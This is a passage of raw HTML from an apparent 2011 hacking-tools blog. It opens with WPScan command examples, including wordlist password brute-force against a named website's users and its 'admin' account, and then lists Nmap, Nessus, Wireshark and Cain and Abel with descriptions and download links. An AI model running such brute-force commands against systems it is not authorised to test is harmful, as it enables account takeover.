<span class="Apple-style-span" style="color: #cc0000; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; line-height: 20px;"><code style="background-attachment: initial; background-clip: initial; background-color: #eeeeee; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Consolas, 'Andale Mono', Monaco, Courier, 'Courier New', Verdana, sans-serif; font-size: 1em; line-height: 1em; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">ruby ./wpscan.rb --url www.hackersgarage.com</code></span></div><div style="font-size: 12px; margin-bottom: 1.667em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span class="Apple-style-span" style="color: #cc0000; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; line-height: 20px;">Do wordlist password brute force on enumerated users using 50 threads…</span><br />
<span class="Apple-style-span" style="color: #cc0000; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; line-height: 20px;"><code style="background-attachment: initial; background-clip: initial; background-color: #eeeeee; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Consolas, 'Andale Mono', Monaco, Courier, 'Courier New', Verdana, sans-serif; font-size: 1em; line-height: 1em; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">ruby ./wpscan.rb --url www.hackersgarage.com --wordlist darkc0de.lst --threads 50</code></span></div><div style="font-size: 12px; margin-bottom: 1.667em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span class="Apple-style-span" style="color: #cc0000; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; line-height: 20px;">Do wordlist password brute force on the ‘admin’ username only…</span><br />
<span class="Apple-style-span" style="color: #cc0000; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; line-height: 20px;"><code style="background-attachment: initial; background-clip: initial; background-color: #eeeeee; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Consolas, 'Andale Mono', Monaco, Courier, 'Courier New', Verdana, sans-serif; font-size: 1em; line-height: 1em; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">ruby ./wpscan.rb --url www.hackersgarage.com --wordlist darkc0de.lst --username admin</code></span></div><div style="font-size: 12px; margin-bottom: 1.667em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span class="Apple-style-span" style="color: #cc0000; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; line-height: 20px;">Generate a new ‘most popular’ plugin list, up to 150 pages…</span><br />
<span class="Apple-style-span" style="color: #cc0000; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; line-height: 20px;"><code style="background-attachment: initial; background-clip: initial; background-color: #eeeeee; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Consolas, 'Andale Mono', Monaco, Courier, 'Courier New', Verdana, sans-serif; font-size: 1em; line-height: 1em; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">ruby ./wpscan.rb --generate_plugin_list 150</code></span></div><div style="font-size: 12px; margin-bottom: 1.667em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span class="Apple-style-span" style="color: #cc0000; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; line-height: 20px;">Enumerate instaled plugins…</span><br />
<span class="Apple-style-span" style="color: #cc0000; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; line-height: 20px;"><code style="background-attachment: initial; background-clip: initial; background-color: #eeeeee; background-image: initial; background-origin: initial; font-family: Consolas, 'Andale Mono', Monaco, Courier, 'Courier New', Verdana, sans-serif; font-size: 1em; line-height: 1em; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">ruby ./wpscan.rb --enumerate p</code></span></div></div>deadbjhttp://www.blogger.com/profile/07668877947934556480noreply@blogger.com0tag:blogger.com,1999:blog-4622788998166863521.post-35430832865841556762011-07-29T09:01:00.000-07:002011-07-29T09:01:02.283-07:007 Must Have Tools For Every Hacker<div dir="ltr" style="text-align: left;" trbidi="on"><span class="Apple-style-span" style="color: #333333; font-family: Helvetica, Arial, 'Lucida Grande', Verdana, sans-serif; font-size: 12px; line-height: 18px;"></span><br />
<h2 class="post_cat" style="border-bottom-color: rgb(218, 218, 218); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; clear: both; color: #999999; font-family: Helvetica, Arial, 'Lucida Grande', Verdana, sans-serif; font-size: 0.8em; font-style: inherit; font-weight: bold; letter-spacing: 0.1em; line-height: 1.8em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0.2em; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-transform: uppercase; vertical-align: baseline;">HACKING TOOLS</h2><h2 class="post_name" id="post-5" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; clear: both; color: #111111; font-family: Helvetica, Arial, 'Lucida Grande', Verdana, sans-serif; font-size: 2em; font-style: inherit; font-weight: normal; letter-spacing: -0.04em; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">7 Must Have Tools For Every Hacker</h2><div class="post_meta" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #666666; font-family: inherit; font-size: 0.8em; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0.4em; padding-left: 0px; padding-right: 0px; padding-top: 0.3em; text-transform: uppercase; vertical-align: baseline;"><br />
</div><div class="post_text" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0.9em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">Hacking tools are developed by some really good <img alt="" class="border alignright" height="128" id="main_image" src="http://img291.imageshack.us/img291/5967/hackingbig.jpg" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-color: rgb(221, 221, 221); border-right-style: solid; border-right-width: 1px; border-style: initial; border-top-width: 0px; cursor: pointer; float: right; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 10px; margin-left: 14px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 9px; padding-top: 0px; vertical-align: baseline;" width="139" />coders out there to ease out many complex tasks which have to be done manually and took painstakingly great deal of time and effort.All these tools provided here are free of cost,are tried hands on and are being actively developed by community,and if not,their alternatives are provided.To summarize it up,these are the 7 must have tools for every hacker out there</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><br />
</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">1. <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><em style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: italic; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Nmap </em></strong><br />
I think everyone has heard of this one, it recently had a version 5 release.<br />
<strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Nmap (Network Mapper)</strong> is a free <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">open source</strong><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"> </strong>utility for network exploration or <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">security</strong> auditing. It was designed to rapidly scan large networks, although it works fine against single hosts.Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use,and dozens of other characteristics. It may be used to discover computers and services on a computer network, thus creating a “map” of the <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">network</strong>.Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.Can be used by beginners (-sT) or by pros alike (packet_trace). A very versatile tool, once you fully understand the results.</div><h2 style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; clear: both; color: #111111; font-family: Helvetica, Arial, 'Lucida Grande', Verdana, sans-serif; font-size: 2em; font-style: inherit; font-weight: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><a href="http://nmap.org/download.html" style="border-bottom-color: rgb(238, 238, 238); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: black; font-family: inherit; font-size: 24px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">Download Nmap</a></h2><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><br />
</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">2. <em style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: italic; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Nessus Remote Security Scanner</strong> </em><br />
Recently went closed source, but is still essentially free. <img alt="" class="alignright" height="93" src="http://www.cs.cmu.edu/~dwendlan/personal/images/nessus.jpg" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; float: right; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 10px; margin-left: 14px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;" width="96" />Works with a client-server framework.Nessus is the worlds most popular vulnerability scanner used in over 75,000organizations world-wide. Many of the worlds largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.</div><h2 style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; clear: both; color: #111111; font-family: Helvetica, Arial, 'Lucida Grande', Verdana, sans-serif; font-size: 2em; font-style: inherit; font-weight: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><a href="http://tenable.com/products/nessus/nessus-download-agreement" style="border-bottom-color: rgb(238, 238, 238); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: black; font-family: inherit; font-size: 24px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">Download Nessus</a></h2><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><br />
</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">3. <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><em style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: italic; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Wireshark </em></strong><br />
If you have been reading my site,you might have read about <img alt="" class="alignright" height="84" src="http://www.linuxaria.com/wp-content/uploads/2010/09/wireshark.png" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; float: right; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 10px; margin-left: 14px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;" width="84" />it in a couple of articles.Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers. Works great on both <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Linux</strong> and <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Windows</strong> (with a GUI), easy to use and can reconstruct<strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">TCP/IP</strong><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"> </strong>Streams! .</div><h2 style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; clear: both; color: #111111; font-family: Helvetica, Arial, 'Lucida Grande', Verdana, sans-serif; font-size: 2em; font-style: inherit; font-weight: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><a href="http://www.wireshark.org/download.html" style="border-bottom-color: rgb(238, 238, 238); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: black; font-family: inherit; font-size: 24px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">Download Wireshark</a></h2><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><br />
</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">4. <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><em style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: italic; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Cain and Abel </em></strong><br />
The swiss knife of hacking tools..Cain & Abel is a<strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"> </strong><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">password</strong> recovery tool for<strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"> </strong><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Microsoft</strong> Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.The program does not exploit any <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">software</strong> vulnerabilities or bugs that could not be fixed with little effort.</div><h2 style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; clear: both; color: #111111; font-family: Helvetica, Arial, 'Lucida Grande', Verdana, sans-serif; font-size: 2em; font-style: inherit; font-weight: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><a href="http://www.oxid.it/downloads/ca_setup.exe" style="border-bottom-color: rgb(238, 238, 238); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: black; font-family: inherit; font-size: 24px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">Download <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 24px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><em style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 24px; font-style: italic; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"></em></strong></a><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 24px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><em style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 24px; font-style: italic; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><a href="" style="border-bottom-color: rgb(238, 238, 238); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: black; font-family: inherit; font-size: 24px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;">Cain and Abel</a></em></strong></h2><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><br />
</div><ins style="border-bottom-style: none; border-bottom-width: 0px; border-color: initial; border-color: initial; border-left-style: none; border-left-width: 0px; border-right-style: none; border-right-width: 0px; border-style: initial; border-top-style: none; border-top-width: 0px; border-width: initial; display: inline-table; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; height: 60px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative; vertical-align: baseline; visibility: visible; width: 468px;"><ins id="aswift_2_anchor" style="border-bottom-style: none; border-bottom-width: 0px; border-color: initial; border-color: initial; border-left-style: none; border-left-width: 0px; border-right-style: none; border-right-width: 0px; border-style: initial; border-top-style: none; border-top-width: 0px; border-width: initial; display: block; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; height: 60px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative; vertical-align: baseline; visibility: visible; width: 468px;"><iframe allowtransparency="true" frameborder="0" height="60" hspace="0" id="aswift_2" marginheight="0" marginwidth="0" name="aswift_2" scrolling="no" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; left: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: absolute; top: 0px; vertical-align: baseline;" vspace="0" width="468"></iframe></ins></ins><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: 